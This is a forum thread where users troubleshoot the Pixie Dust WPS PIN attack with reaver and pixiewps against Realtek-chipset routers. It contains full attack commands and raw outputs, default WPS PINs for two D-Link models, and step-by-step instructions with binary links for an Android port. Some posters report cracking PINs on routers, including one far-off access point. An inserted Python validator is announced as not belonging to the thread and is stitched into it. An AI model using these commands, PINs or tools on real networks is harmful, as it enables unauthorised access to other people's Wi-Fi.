I just looked up the RTL8671; it is a CPU chip and not a NIC. Do you know the exact model number of the AP, and can you provide firmware/open source code for it? Thanks.
There is no FCC ID printed on the router. The PIN is also not printed on the router. The exact model of the AP is DIGISOL DG-BG4100NU, which uses the RTL8186 and not the newer RTL8671. Firmware of the router can be downloaded here: https://dl.dropboxusercontent.com/u/..._11OCT2014.zip. Firmware of the chipset: http://sourceforge.net/projects/rtl8186/
Hi, @DetmL, @soxrok2212,
I recently came to know about the vulnerabilities of Realtek and other chipsets and thought I'd check if my router was vulnerable, so I ran reaver in pixie dust mode (-K 1),
where I got to know that the model number EV-2006-07-27 belongs to the RTL8671 chipset (D-Link router).
However, I'm getting
"WPS pin not found"
The output is given below:
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 7b:37:51:7f:6c:c7:a8:0b:27:e9:a1:f8:5b:88:b5:40
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Name: RTL8671
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] R-Nonce: c2:ed:e2:d6:80:81:48:fd:7e:13:7b:d2:3e:6c:a0:98
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: ef:eb:93:91:fc:f0:16:3a:3e:b4:fe:dd:8f:b6:a8:fe:a6 :6a:7e:70:55:e5:20:78:c4:3a:c5:55:66:60:be:d0
[+] Sending M2 message
[P] E-Hash1: be:74:91:eb:c3:38:e0:59:7c:e1:de:5c:07:d5:1b:d3:d7 :e6:15:9e:06:09:96:f9:7c:08:4a:84:cc:df:35:0e
[P] E-Hash2: 90:bf:2e:36:f0:65:0e:f6:41:e7:97:f8:71:02:8b:11:92 :c1:89:f1:99:63:2b:fa:01:12:6c:c5:04:b6:ec:cc
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 3 s
[Pixie-Dust]
[Pixie-Dust] [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.
[Pixie-Dust]
So I ran pixiewps separately instead of reaver and it is giving me a strange error:
[!] Bad enrollee public key -- d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:
I don't know what it means.
I hope you'd shed some light on that and help.... :)
First, you cannot use -S in your reaver command for Realtek devices. Nobody really knows why, but somehow it stops pixiewps from recovering the pin.
Second, the RTL8671 chip is strange. It seems to use a different RNG or something. I know a few people are looking into it though :)
--I've also noticed that your nonce doesn't follow the 00:00:XX:XX:00:00:XX:XX pattern seen in other RTL8671 chips... hmmm. Would you be able to send me a cap containing a few WPS exchanges?
As for the Bad enrollee key, it's probably just a space somewhere in your syntax that is screwing it up. Actually I just found it:
Code:
d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63
Try this instead (you'll probably have to do this for every piece of data):
Code:
d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63
Welcome to the forums by the way :cool:
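As an added illustration (not code from this thread, from reaver or from pixiewps) of why pixiewps rejects data pasted from a wrapped forum post: a small Python checker that strips the spaces the forum inserts every 50 characters, verifies each [P] value has the byte length the WPS Registration Protocol requires, and flags a small-DH PKR (the -S case above) or a missing M3. The transcript it runs on is constructed, not taken from the page.

```python
import re

# Byte lengths of the WPS Registration Protocol values reaver prints with the
# [P] prefix: nonces 16, 1536-bit Diffie-Hellman public keys 192, SHA-256 outputs 32.
EXPECTED_LEN = {"E-Nonce": 16, "R-Nonce": 16, "PKE": 192, "PKR": 192,
                "AuthKey": 32, "E-Hash1": 32, "E-Hash2": 32}
# Public key reaver sends with -S / --dh-small-keys: the DH secret is 1, so PKR = g = 2.
SMALL_DH_PKR = bytes(191) + b"\x02"

def normalize_hex(value):
    """Drop the spaces a forum line-wrap inserts ('2b :1a', '66:4 3:71') and return bytes."""
    cleaned = re.sub(r"[\s:]", "", value)
    if not re.fullmatch(r"[0-9a-fA-F]*", cleaned) or len(cleaned) % 2:
        raise ValueError("not a colon-separated hex string: %r" % value[:40])
    return bytes.fromhex(cleaned)

def parse_reaver_fields(transcript):
    """Return {name: bytes} for every '[P] name: hex' line of a reaver -vvv transcript."""
    fields = {}
    for line in transcript.splitlines():
        m = re.match(r"\[P\]\s+([\w-]+):\s+([0-9a-fA-F: ]+)$", line.strip())
        if m and m.group(1) in EXPECTED_LEN:
            fields[m.group(1)] = normalize_hex(m.group(2))
    return fields

def check_fields(fields):
    """List what pixiewps would reject or what the capture lacks (empty list = consistent)."""
    problems = []
    for name, want in EXPECTED_LEN.items():
        if name not in fields:
            problems.append("%s missing (M3 never received?)" % name)
        elif len(fields[name]) != want:
            problems.append("%s is %d bytes, expected %d" % (name, len(fields[name]), want))
    if fields.get("PKR") == SMALL_DH_PKR:
        problems.append("PKR is the small DH key (-S), reported above to break Realtek recovery")
    return problems

def _wrap(text, width=50):  # mimic the forum software: a space every 50 characters
    return " ".join(text[i:i + width] for i in range(0, len(text), width))

# Constructed transcript (synthetic values): small-DH PKR and no M3 hashes, as discussed above.
SAMPLE = "\n".join([
    "[P] E-Nonce: " + ":".join("%02x" % i for i in range(16)),
    "[P] PKE: " + _wrap(":".join("%02x" % (i % 256) for i in range(192))),
    "[+] Received M1 message",
    "[P] R-Nonce: " + ":".join("%02x" % (16 + i) for i in range(16)),
    "[P] PKR: " + _wrap(":".join("%02x" % b for b in SMALL_DH_PKR)),
    "[P] AuthKey: " + _wrap(":".join("%02x" % i for i in range(32))),
])
```

Running `check_fields(parse_reaver_fields(SAMPLE))` reports the missing E-Hash1/E-Hash2 and the small-DH PKR; a clean capture with full-length values returns an empty list.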
Is it A DSL-2730U/DSL-2750U?
Hi DetmL
For the two models you speak about we could gather generic PINs (cf. WPSPIN > Default WPS PIN generator for Huawei, Belkin ... routers)
DSL-2730U > 20172527
DSL-2750U > 21464065
If there is a common PIN we already know that we deal with a "weak" WPS implementation and so there is hope... it could be "pixie dusted" somehow...
If you have one of these models could you please send to soxrok2212 / wiire (or you can send it to me and I will share with them) a *.cap file with the reaver 1.5.2 stdout?
Maybe, if that is not asking too much, you could add some screenshots / copy-paste from the administration interface with the Wi-Fi WPS security parameters and information about the device?
Thanks in advance
@soxrok2212
Firstly, I apologize for the late reply. I have got exams; the last few days have been pretty intense.
1) I tried without --dh-small-keys, but no luck
Still WPS pin not found.
2) I've mailed to your old email-id the reaver outputs.
3) Yeah, and the spaces in the enrollee key :|
Tried pixiewps with the correct syntax but no luck :(
It says the AP might be vulnerable, try bruteforcing.
Tried with --force a couple of times but the pin was not found there either.
@DetmL
It is D-link DSL-2750U rev U1
Wikidevi link: https://wikidevi.com/wiki/D-Link_DSL-2750U_rev_U1
@Kcdtv
Sorry for the confusion. I don't have either of the devices.
I run
sudo reaver -i mon0 -vvv -K 1 -b 02:26:4D:AA:XX:XX
but I never get M3 message (e-hash1 and e-hash2). I tried with several routers and the output from reaver never contains hash1 or hash2.
Any ideas what is wrong?
I configured the router for WPS. It is based on Ralink RT2860. Signal is good (1m distance).
I use a laptop with an Intel Centrino Wifi N card and reaver 1.5.2 from github, mod by t6_x.
It is unreliable, but I think injection works:
sudo aireplay-ng -9 mon0
14:00:37 Trying broadcast probe requests...
14:00:37 Injection is working!
.........
14:00:39 Trying directed probe requests...
14:00:39 84:9C:A6:A7:22:22 - channel: 2 - 'o2-WLAN25'
14:00:39 Ping (min/avg/max): 0.978ms/5.656ms/47.815ms Power: -49.97
14:00:39 30/30: 100%
14:00:39 02:23:08:F9:33:11 - channel: 1 - 'EasyBox-C54211'
14:00:40 Ping (min/avg/max): 0.926ms/7.952ms/44.700ms Power: -43.68
14:00:40 28/30: 93%
Sorry, I didn't see your message.
For sure; thank you very much! I'm sending you a PM with my email.
@bora.
This is not really a "pixie dust issue" if you don't get an M3... It is an issue for the pixie dust attack, but the problem is about how the WPS flow is done.
And more information would be needed to be able to guess where the problem can come from.
Quote:
It is unreliable, but I think injection works:
Don't worry: it is reliable if aireplay-ng -9 works; your card can inject.
It is not that people don't want to help you but your questions are "offtopic."
It could be an issue with reaver, with your card, with your system configuration or with the access point... etc.
But for sure it has nothing to do with pixiewps: pixiewps needs you to collect the needed strings properly, or it cannot brute-force the M3.
How to get the M3 to brute-force it with its "authkey" is another question, another subject.
Cheers
Just a quick update on the state of the 'project'.
I'm really busy at the moment. I'll update/fix pixiewps when I'll be back (2-3 weeks), with (hopefully) some news.
Best of luck!
Looking forward to it.
Hi, I wanted help regarding a D-Link DSL 2750u router I was testing with RTL8167 chipset with pixiewps. Any updates on the issue?
We are still looking into the RTL816x chipset. We have some information about how the nonce might be 'built'. However, it's still not enough to implement a feasible bruteforce.
Nice work indeed, tried this today on a DIR-605L and it worked like a charm even with bad signals (AP is very far away); WPS transaction failed a few times and then voila.
PIN was not default and started with 4; the normal WPS attack vector would never have found it because of lockout.
I think the WPS attack is not possible for NETGEAR? Tried with two different APs but no luck.
I've got lots of APs if you want me to test something new.
Ported to Android.
https://github.com/aanarchyy/pixiewps-android
Binaries for pixiewps and reaver-t6x.
http://www.mediafire.com/download/bw...android.tar.gz
Nice job aanarchy!
I have confirmed the t6x_reaver port does work, a little bit of segfault action going on, but it has about a 70% success rate for me, though that may be hardware related... TESTERS APPRECIATED!!!!
I have agreed with the developers to not release an APK.
Prerequisites:
Install both linked binaries (reaver and pixiewps) in the path (e.g. copy to /system/xbin)
Have a working copy of bcmon on device.
How I got it working:
Enable monitor mode through the bcmon app.
Open a shell in a terminal emulator on the device.
Obtain root in the shell.
Load the bcmon wrapper:
Code:
LD_PRELOAD=/data/data/com.bcmon.bcmon/files/libs/libfake_driver.so sh
Then run reaver as normal...
Code:
reaver -i wlan0 -b <target> -K1 -P -vvv
Hello Guys,
I have tried pixiewps 1.1 on Kali 2.0. I have found Pixiewps does not work with the Realtek RTL8671 chipset. I have tried with the -V 3 -f 4 option but no luck.
Has anyone faced the issue for chipset Realtek RTL8671?
Thanks in advance.
Yes, it is a known problem. RTL8671 is a SoC (System on Chip) and it seems that its number generation is a bit different from their other chips.
Thank you for the information.
Hi soxrok2212 !
Today, I have found the tool created by SilentGhostX: https://github.com/SilentGhostX/HT-WPS-Breaker. It does work for RTL8671 with model number 2010 as per the screenshot given in the URL. When I tried with RTL8671 model number 2006, it seems not to be working with model 2006.
I am not getting the hash code... please check my attached picture and please guide me with further details... Attachment 906
I am using HT-WPS Breaker By Silent Ghost X
Chipset : Realtek RTL8671
WPS Manufacturer: Wireless Router
WPS Model Name: RTL8671
WPS Model Number: EV-2006-07-27
Access Point Serial Number: 123456789012347
Needed Information as below:
Trying pin 12345670.
I'm waiting for 3 hours and getting "Sorry pin not found, good luck next time"...
Veterans, please provide further guidance...
Thanks in advance
jenisbob
Attachment 921
Attachment 922
Dear soxrok2212 ,
Thanks for the quick response..
Again I am not getting the WPS pin on the TP-Link router... please check the attached picture. Attachment 931